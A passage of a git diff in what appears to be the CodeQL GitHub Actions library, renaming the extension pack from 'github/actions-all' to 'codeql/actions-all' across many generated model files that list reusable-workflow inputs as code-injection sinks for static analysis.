"code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml index 2fb4ca82763..2fa4322aff4 100644 --- a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["litestar-org/litestar/.github/workflows/test.yml", "*", "input.python-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml index 92d91e541b9..5f90523e833 100644 --- a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.package_name_prefix", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml index ebf68ff3c12..9ffbce337f4 100644 --- a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["lnbits/lnbits/.github/workflows/make.yml", "*", "input.make", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml index 22f0fedcc07..2182d445b83 100644 --- a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["lutris/lutris/.github/workflows/publish-ppa.yml", "*", "input.PPA_URI", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml index 23da361034c..1928629382d 100644 --- a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.pinned_mailu_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml index 19a5da19960..59f7022fd89 100644 --- a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mamba-org/mamba/.github/workflows/windows_impl.yml", "*", "input.build_type", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml index abd0215aada..f2e55b0dc5e 100644 --- a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "input.CTEST_END", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml index 5144d9ee2cb..f92cfbba9c5 100644 --- a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["marcelotduarte/cx_freeze/.github/workflows/build-wheel.yml", "*", "input.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml index 5a70ae48ec6..09318cf02bb 100644 --- a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-mahapps-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml index 81130d31fa3..48a3258e7a8 100644 --- a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["matter-labs/zksync-era/.github/workflows/ci-core-reusable.yml", "*", "input.compilers", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml index f49f239ac9b..cc8afde9d6a 100644 --- a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mattermost/desktop/.github/workflows/e2e-functional-template.yml", "*", "input.nightly", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml index 53be189b31e..2960e471d2e 100644 --- a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml index 2d6132a396f..a4f095a2359 100644 --- a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mealie-recipes/mealie/.github/workflows/partial-builder.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml index 0cb5e01e3aa..cba13033669 100644 --- a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.adapter_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml index cd3ca5d7c01..3fa02372683 100644 --- a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["meshtastic/firmware/.github/workflows/build_rpi2040.yml", "*", "input.board", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml index c8f1b93ef2d..d31c7ee7804 100644 --- a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microcks/microcks/.github/workflows/package-native.yml", "*", "input.image-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml index 7877af9bbbf..a270324f866 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/applicationinsights-java/.github/workflows/reusable-scheduled-job-notification.yml", "*", "input.success", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml index 3d9b8716682..58dc1dd30af 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/chat-copilot/.github/workflows/copilot-run-integration-tests.yml", "*", "input.BACKEND_HOST", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml index b14db181cce..7255b0fa879 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml index 6a883e369c0..b2aacde75df 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/oryx/.github/workflows/automationTemplate.yaml", "*", "input.platformName", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml index 9612750345d..4bc1aec46a2 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/pr-metrics/.github/workflows/release-phase-1-internal.yml", "*", "input.patch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml index 2c6f4438846..1309dc357a2 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.extraRunWindowsArgs", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml index 109b1fefa7b..a76e015ab89 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/vscode-cpptools/.github/workflows/job-compile-and-test.yml", "*", "input.yarn-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml index 87f8bc706b6..b9da0f85225 100644 --- a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.env", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml index 4c2f4e391b5..99e2d783c66 100644 --- a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["moby/moby/.github/workflows/.windows.yml", "*", "input.storage", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml index e3e0a3460d4..cef0c9134aa 100644 --- a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.context", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml index 01539c4329b..6c9f45dbad0 100644 --- a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "input.test", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml index d26e49d3ef8..40856fa46b3 100644 --- a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mudler/localai/.github/workflows/image_build.yml", "*", "input.latest-image-aio", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml index f5b370e3d59..807229fc6b5 100644 --- a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.amazonflag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml index 72659e36271..df2220211b9 100644 --- a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["n8n-io/n8n/.github/workflows/e2e-reusable.yml", "*", "input.pr_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml index f37d70a718d..7faea6b07ef 100644 --- a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["napari/napari/.github/workflows/reusable_run_tox_test.yml", "*", "input.qt_backend", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml index 3b4ed4b18b5..43018d43110 100644 --- a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "input.target_platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml index 3dddb9bd3f9..eaf9a48f30f 100644 --- a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nautobot/nautobot/.github/workflows/plugin_upstream_testing_base.yml", "*", "input.invoke_context_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml index 49654eb84b8..b50566bcad6 100644 --- a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "input.with_default", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml b/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml index f46bcbee1b3..8bd7e837d38 100644 --- a/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["neondatabase/neon/.github/workflows/build-build-tools-image.yml", "*", "input.image-tag", "output.image-tag", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml index e3791339c03..7b76f842451 100644 --- a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["neovim/neovim/.github/workflows/test_windows.yml", "*", "input.build_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml index f5f6c919cfb..ee4636c6a2d 100644 --- a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.custom_run_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml index 4747cd57c4d..5f1f9ea13ad 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["newrelic/newrelic-dotnet-agent/.github/workflows/publish_release_notes.yml", "*", "input.agent_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml index 3b68ca76fe2..d2188efb8ee 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["newrelic/newrelic-java-agent/.github/workflows/X-Reusable-VerifyInstrumentation.yml", "*", "input.page", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml index 62b99c23ff6..ed86bf9266b 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "input.changelog_file", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml index 84347b6cbfa..79a253fe25e 100644 --- a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "input.AppVersion", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml index 32a3d5061e2..f78830a9f9a 100644 --- a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.target_tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml index d4ffc373678..789cdc003be 100644 --- a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "input.shard", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml index 5a5d3999ca7..a2d7f77b253 100644 --- a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "input.docker_image", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml index 9983ea4eee2..c3d0b1d8751 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/abbrev-js/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml index e8acf5f2c3c..35aeca022bc 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/cli/.github/workflows/node-integration.yml", "*", "input.npmVersion", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml index bd7494ab69a..419d80970fa 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/fs-minipass/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml index 89b60a4ac84..07841ba0a18 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/hosted-git-info/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml index 7c72cb57dca..2501e39f850 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/ini/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml index 2e9681cb21e..2a1fd972192 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/json-parse-even-better-errors/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml index d30f1bb7bba..46568f16fa6 100644 --- 